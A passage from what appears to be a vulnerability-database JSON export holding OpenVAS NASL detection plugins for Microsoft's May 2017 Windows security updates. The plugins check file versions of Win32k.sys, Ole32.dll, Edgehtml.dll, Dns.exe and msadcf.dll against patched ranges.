rights.Also\n an attacker who successfully exploited this vulnerability could run processes\n in an elevated context and can lead to denial of service condition as well.This\n 
vulnerability also could allow attacker obtain sensitive information to further\n compromise the user's system.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows XP SP2 x64\n\n - Microsoft Windows XP SP3 x86\n\n - Microsoft Windows Vista x32/x64 Edition Service Pack 2\n\n - Microsoft Windows 2003 x32/x64 Edition Service Pack 2 and prior\n\n - Microsoft Windows Server 2008 x32/x64 Edition Service Pack 2 and prior\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4019204\");\n script_xref(name:\"URL\", value:\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0245\");\n script_xref(name:\"URL\", value:\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0246\");\n script_xref(name:\"URL\", value:\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0263\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(xp:4, xpx64:3, win2003:3, win2003x64:3, winVista:3,\n win2008:3, winVistax64:3, win2008x64:3) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nwinVer = fetch_file_version(sysPath:sysPath, file_name:\"Win32k.sys\");\nif(!winVer){\n exit(0);\n}\n\nif(hotfix_check_sp(winVista:3, winVistax64:3, win2008:3, win2008x64:3) > 0)\n{\n 
if(version_is_less(version:winVer, test_version:\"6.0.6002.19778\"))\n {\n Vulnerable_range = \"Less than 6.0.6002.19778\";\n VULN = TRUE ;\n }\n\n else if(version_in_range(version:winVer, test_version:\"6.0.6002.24000\", test_version2:\"6.0.6002.24094\"))\n {\n Vulnerable_range = \"6.0.6002.24000 - 6.0.6002.24094\";\n VULN = TRUE ;\n }\n\n}\n\nelse if(hotfix_check_sp(xp:4) > 0)\n{\n if(version_is_less(version:winVer, test_version:\"5.1.2600.7258\"))\n {\n Vulnerable_range = \"Less than 5.1.2600.7258\";\n VULN = TRUE ;\n }\n}\n\nelse if(hotfix_check_sp(win2003:3, win2003x64:3, xpx64:3) > 0)\n{\n if(version_is_less(version:winVer, test_version:\"5.2.3790.6080\"))\n {\n Vulnerable_range = \"Less than 5.2.3790.6080\";\n VULN = TRUE ;\n }\n}\n\nif(VULN)\n{\n report = 'File checked: ' + sysPath + \"\\Win32k.sys\" + '\\n' +\n 'File version: ' + winVer + '\\n' +\n 'Vulnerable range: ' + Vulnerable_range + '\\n' ;\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:19:54", "description": "This host is missing an important security\n update according to Microsoft KB4018556", "cvss3": {}, "published": "2017-05-10T00:00:00", "type": "openvas", "title": "Microsoft COM Multiple Vulnerabilities (KB4018556)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-0244", "CVE-2017-0214", "CVE-2017-0258", "CVE-2017-0213"], "modified": "2020-06-04T00:00:00", "id": "OPENVAS:1361412562310811118", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811118", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft COM Multiple Vulnerabilities (KB4018556)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the 
terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811118\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-0213\", \"CVE-2017-0214\", \"CVE-2017-0244\", \"CVE-2017-0258\");\n script_bugtraq_id(98112, 98109, 98103, 98102);\n script_tag(name:\"cvss_base\", value:\"6.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-05-10 12:51:18 +0530 (Wed, 10 May 2017)\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_name(\"Microsoft COM Multiple Vulnerabilities (KB4018556)\");\n\n script_tag(name:\"summary\", value:\"This host is missing an important security\n update according to Microsoft KB4018556\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - The Windows kernel improperly initializes objects in memory.\n\n - The way that the Windows Kernel handles objects in memory.\n\n - Windows fails to properly validate input before loading type libraries.\n\n - An unspecified error in Windows COM Aggregate Marshaler.\");\n\n script_tag(name:\"impact\", 
value:\"An attacker who successfully exploited the\n vulnerability can elevate their privilege level, can lead to denial of\n service condition, could obtain information to further compromise the users\n system and run arbitrary code with elevated privileges.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Windows Server 2008 x32/x64 Edition Service Pack 2.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-gb/help/4018556\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win2008:3, win2008x64:3) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nif(!asVer = fetch_file_version(sysPath:sysPath, file_name:\"Ole32.dll\")){\n exit(0);\n}\n\nif(version_is_less(version:asVer, test_version:\"6.0.6002.19773\"))\n{\n Vulnerable_range = \"Less than 6.0.6002.19773\";\n VULN = TRUE ;\n}\n\nelse if(version_in_range(version:asVer, test_version:\"6.0.6002.23000\", test_version2:\"6.0.6002.24088\"))\n{\n Vulnerable_range = \"6.0.6002.23000 - 6.0.6002.24088\";\n VULN = TRUE ;\n}\n\nif(VULN)\n{\n report = 'File checked: ' + sysPath + \"\\Ole32.dll\" + '\\n' +\n 'File version: ' + asVer + '\\n' +\n 'Vulnerable range: ' + Vulnerable_range + '\\n' ;\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:19:39", "description": "This 
host is missing a critical/important\n security update according to Microsoft KB4019472.", "cvss3": {}, "published": "2017-05-10T00:00:00", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4019472)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-0226", "CVE-2017-0231", "CVE-2017-0229", "CVE-2017-0190", "CVE-2017-0280", "CVE-2017-0228", "CVE-2017-0248", "CVE-2017-0272", "CVE-2017-0279", "CVE-2017-0271", "CVE-2017-0233", "CVE-2017-0270", "CVE-2017-0214", "CVE-2017-0240", "CVE-2017-0269", "CVE-2017-0227", "CVE-2017-0259", "CVE-2017-0230", "CVE-2017-0258", "CVE-2017-0274", "CVE-2017-0266", "CVE-2017-0275", "CVE-2017-0064", "CVE-2017-0263", "CVE-2017-0238", "CVE-2017-0236", "CVE-2017-0278", "CVE-2017-0267", "CVE-2017-0212", "CVE-2017-0077", "CVE-2017-0221", "CVE-2017-0277", "CVE-2017-0273", "CVE-2017-0222", "CVE-2017-0268", "CVE-2017-0241", "CVE-2017-0213", "CVE-2017-0234", "CVE-2017-0276", "CVE-2017-0171", "CVE-2017-0246"], "modified": "2020-06-04T00:00:00", "id": "OPENVAS:1361412562310811107", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811107", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4019472)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811107\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-0064\", \"CVE-2017-0077\", \"CVE-2017-0171\", \"CVE-2017-0190\",\n \"CVE-2017-0212\", \"CVE-2017-0213\", \"CVE-2017-0214\", \"CVE-2017-0221\",\n \"CVE-2017-0222\", \"CVE-2017-0226\", \"CVE-2017-0227\", \"CVE-2017-0228\",\n \"CVE-2017-0229\", \"CVE-2017-0230\", \"CVE-2017-0231\", \"CVE-2017-0233\",\n \"CVE-2017-0234\", \"CVE-2017-0236\", \"CVE-2017-0238\", \"CVE-2017-0240\",\n \"CVE-2017-0241\", \"CVE-2017-0246\", \"CVE-2017-0248\", \"CVE-2017-0258\",\n \"CVE-2017-0259\", \"CVE-2017-0263\", \"CVE-2017-0266\", \"CVE-2017-0267\",\n \"CVE-2017-0268\", \"CVE-2017-0269\", \"CVE-2017-0270\", \"CVE-2017-0271\",\n \"CVE-2017-0272\", \"CVE-2017-0273\", \"CVE-2017-0274\", \"CVE-2017-0275\",\n \"CVE-2017-0276\", \"CVE-2017-0277\", \"CVE-2017-0278\", \"CVE-2017-0279\",\n \"CVE-2017-0280\");\n script_bugtraq_id(98121, 98114, 98097, 98298, 98099, 98102, 98103, 98147, 98127,\n 98139, 98281, 98164, 98217, 98222, 98173, 98179, 98229, 98234,\n 98237, 98203, 98208, 98108, 98117, 98112, 98113, 98258, 98276,\n 98259, 98261, 98263, 98264, 98265, 98260, 98274, 98266, 98267,\n 98268, 98270, 98271, 98272, 98273);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-05-10 08:54:53 +0530 (Wed, 10 May 2017)\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n 
script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4019472)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical/important\n security update according to Microsoft KB4019472.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to obtain information to further compromise the user's system, execute\n arbitrary code in the context of the current user, gain the same user rights as\n the current user, could take control of an affected system, spoof content, bypass\n certain security restrictions and cause a host machine to crash.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 10 Version 1607 x32/x64\n\n - Microsoft Windows Server 2016\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-gb/help/4019472\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1, win2016:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"Edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(version_in_range(version:edgeVer, test_version:\"11.0.14393.0\", test_version2:\"11.0.14393.1197\"))\n{\n report = 'File checked: ' + sysPath + \"\\Edgehtml.dll\" + '\\n' +\n 'File version: ' 
+ edgeVer + '\\n' +\n 'Vulnerable range: 11.0.14393.0 - 11.0.14393.1197\\n' ;\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:19:21", "description": "This host is missing a critical security\n update according to Microsoft Security update KB4016871.", "cvss3": {}, "published": "2017-05-10T00:00:00", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4016871)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-0226", "CVE-2017-0231", "CVE-2017-0229", "CVE-2017-0280", "CVE-2017-0228", "CVE-2017-0248", "CVE-2017-0272", "CVE-2017-0279", "CVE-2017-0271", "CVE-2017-0233", "CVE-2017-0270", "CVE-2017-0214", "CVE-2017-0235", "CVE-2017-0240", "CVE-2017-0269", "CVE-2017-0227", "CVE-2017-0259", "CVE-2017-0230", "CVE-2017-0224", "CVE-2017-0258", "CVE-2017-0274", "CVE-2017-0266", "CVE-2017-0275", "CVE-2017-0064", "CVE-2017-0263", "CVE-2017-0238", "CVE-2017-0236", "CVE-2017-0278", "CVE-2017-0267", "CVE-2017-0212", "CVE-2017-0077", "CVE-2017-0277", "CVE-2017-0273", "CVE-2017-0222", "CVE-2017-0268", "CVE-2017-0241", "CVE-2017-0213", "CVE-2017-0234", "CVE-2017-0276", "CVE-2017-0246"], "modified": "2020-06-04T00:00:00", "id": "OPENVAS:1361412562310811108", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811108", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4016871)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY 
WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811108\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-0064\", \"CVE-2017-0077\", \"CVE-2017-0212\", \"CVE-2017-0213\",\n \"CVE-2017-0214\", \"CVE-2017-0222\", \"CVE-2017-0224\", \"CVE-2017-0226\",\n \"CVE-2017-0227\", \"CVE-2017-0228\", \"CVE-2017-0229\", \"CVE-2017-0230\",\n \"CVE-2017-0231\", \"CVE-2017-0233\", \"CVE-2017-0234\", \"CVE-2017-0235\",\n \"CVE-2017-0236\", \"CVE-2017-0238\", \"CVE-2017-0240\", \"CVE-2017-0241\",\n \"CVE-2017-0246\", \"CVE-2017-0248\", \"CVE-2017-0258\", \"CVE-2017-0259\",\n \"CVE-2017-0263\", \"CVE-2017-0266\", \"CVE-2017-0267\", \"CVE-2017-0268\",\n \"CVE-2017-0269\", \"CVE-2017-0270\", \"CVE-2017-0271\", \"CVE-2017-0272\",\n \"CVE-2017-0273\", \"CVE-2017-0274\", \"CVE-2017-0275\", \"CVE-2017-0276\",\n \"CVE-2017-0277\", \"CVE-2017-0278\", \"CVE-2017-0279\", \"CVE-2017-0280\");\n script_bugtraq_id(98121, 98114, 98099, 98102, 98103, 98127, 98214, 98139, 98281,\n 98164, 98217, 98222, 98173, 98179, 98229, 98230, 98234, 98237,\n 98203, 98208, 98108, 98117, 98112, 98113, 98258, 98276, 98259,\n 98261, 98263, 98264, 98265, 98260, 98274, 98266, 98267, 98268,\n 98270, 98271, 98272, 98273);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-05-10 08:52:53 +0530 (Wed, 10 May 2017)\");\n 
script_tag(name:\"qod_type\", value:\"executable_version\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4016871)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft Security update KB4016871.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This monthly rollup,\n\n - Addressed issue with Surface Hub devices waking from sleep approximately\n every four minutes after the first two hours.\n\n - Addressed issue where autochk.exe can randomly skip drive checks and not fix\n corruptions, which may lead to data loss.\n\n - Addressed an issue where Microsoft Edge users in networking environments that\n do not fully support the TCP Fast Open standard may have problems connecting\n to some websites. Users can re-enable TCP Fast Open in about:flags.\n\n - Addressed issues with Arc Touch mouse Bluetooth connectivity.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to obtain information to further compromise the user's system, execute\n arbitrary code in the context of the current user, gain the same user rights as\n the current user, could take control of an affected system, cause a host\n machine to crash, spoof content and bypass security restrictions.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Windows 10 Version 1703 x32/x64.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. 
Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-gb/help/4016871\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-gb/help/4016871\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"Edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(version_in_range(version:edgeVer, test_version:\"11.0.15063.0\", test_version2:\"11.0.15063.295\"))\n{\n report = 'File checked: ' + sysPath + \"\\Edgehtml.dll\" + '\\n' +\n 'File version: ' + edgeVer + '\\n' +\n 'Vulnerable range: 11.0.15063.0 - 11.0.15063.295\\n' ;\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:20:18", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-0171"], "description": "This host is missing an important security\n update according to Microsoft KB4018196", "modified": "2020-06-04T00:00:00", "published": "2017-05-10T00:00:00", "id": "OPENVAS:1361412562310811115", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811115", "type": "openvas", "title": "Microsoft Windows DNS Server Denial of Service Vulnerability (KB4018196)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows 
DNS Server Denial of Service Vulnerability (KB4018196)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811115\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-0171\");\n script_bugtraq_id(98097);\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-05-10 12:41:18 +0530 (Wed, 10 May 2017)\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_name(\"Microsoft Windows DNS Server Denial of Service Vulnerability (KB4018196)\");\n\n script_tag(name:\"summary\", value:\"This host is missing an important security\n update according to Microsoft KB4018196\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists when the server is\n configured to answer version queries. 
An attacker who successfully exploited\n this vulnerability could cause the DNS Server service to become nonresponsive.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow a remote\n attacker to send malicious DNS queries, which results in denial of service.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Windows Server 2008 x32/x64 Edition Service Pack 2.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-gb/help/4018196\");\n script_xref(name:\"URL\", value:\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0171\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win2008:3, win2008x64:3) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nif(!asVer = fetch_file_version(sysPath:sysPath, file_name:\"Dns.exe\")){\n exit(0);\n}\n\nif(version_is_less(version:asVer, test_version:\"6.0.6002.19765\"))\n{\n Vulnerable_range = \"Less than 6.0.6002.19765\";\n VULN = TRUE ;\n}\n\nelse if(version_in_range(version:asVer, test_version:\"6.0.6002.23000\", test_version2:\"6.0.6002.24088\"))\n{\n Vulnerable_range = \"6.0.6002.23000 - 6.0.6002.24088\";\n VULN = TRUE ;\n}\n\n\nif(VULN)\n{\n report = 'File checked: ' + sysPath + \"\\Dns.exe\" + '\\n' +\n 'File version: ' + asVer + '\\n' +\n 'Vulnerable range: ' + Vulnerable_range + '\\n' ;\n security_message(data:report);\n
exit(0);\n}\nexit(0);\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-06-08T23:26:20", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-0242"], "description": "This host is missing an important security\n update according to Microsoft KB4018927.", "modified": "2020-06-04T00:00:00", "published": "2017-05-10T00:00:00", "id": "OPENVAS:1361412562310811031", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811031", "type": "openvas", "title": "Microsoft ActiveX 'Msadcf.dll' Information Disclosure Vulnerability (KB4018927)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft ActiveX 'Msadcf.dll' Information Disclosure Vulnerability (KB4018927)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811031\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-0242\");\n script_bugtraq_id(98275);\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-05-10 11:36:48 +0530 (Wed, 10 May 2017)\");\n script_name(\"Microsoft ActiveX 'Msadcf.dll' Information Disclosure Vulnerability (KB4018927)\");\n\n script_tag(name:\"summary\", value:\"This host is missing an important security\n update according to Microsoft KB4018927.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to some error in the\n way some ActiveX objects are instantiated.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to gain access to sensitive information which can aid in further compromise of\n the user's system.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Windows Server 2008 x32/x64 Edition Service Pack 2 and prior.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. 
Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4018927\");\n script_xref(name:\"URL\", value:\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0242\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win2008:3, win2008x64:3) <= 0){\n exit(0);\n}\n\npath = registry_get_sz(key:\"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\",\n item:\"CommonFilesDir\");\nif(!path){\n exit(0);\n}\n\nfilePath = path + \"\\System\\msadc\";\nfileVer = fetch_file_version(sysPath:filePath, file_name:\"msadcf.dll\");\n\nif(version_is_less(version:fileVer, test_version:\"6.0.6002.19770\"))\n{\n VULN = TRUE ;\n vulnerable_range = \"Less than 6.0.6002.19770\";\n}\nelse if(version_in_range(version:fileVer, test_version:\"6.0.6002.23000\", test_version2:\"6.0.6002.24088\"))\n{\n VULN = TRUE ;\n vulnerable_range = \"6.0.6002.23000 - 6.0.6002.24088\";\n}\n\nif(VULN)\n{\n report = 'File checked: ' + filePath + \"\\msadcf.dll\" + '\\n' +\n 'File version: ' + fileVer + '\\n' +\n 'Vulnerable range: ' + vulnerable_range + '\\n' ;\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": 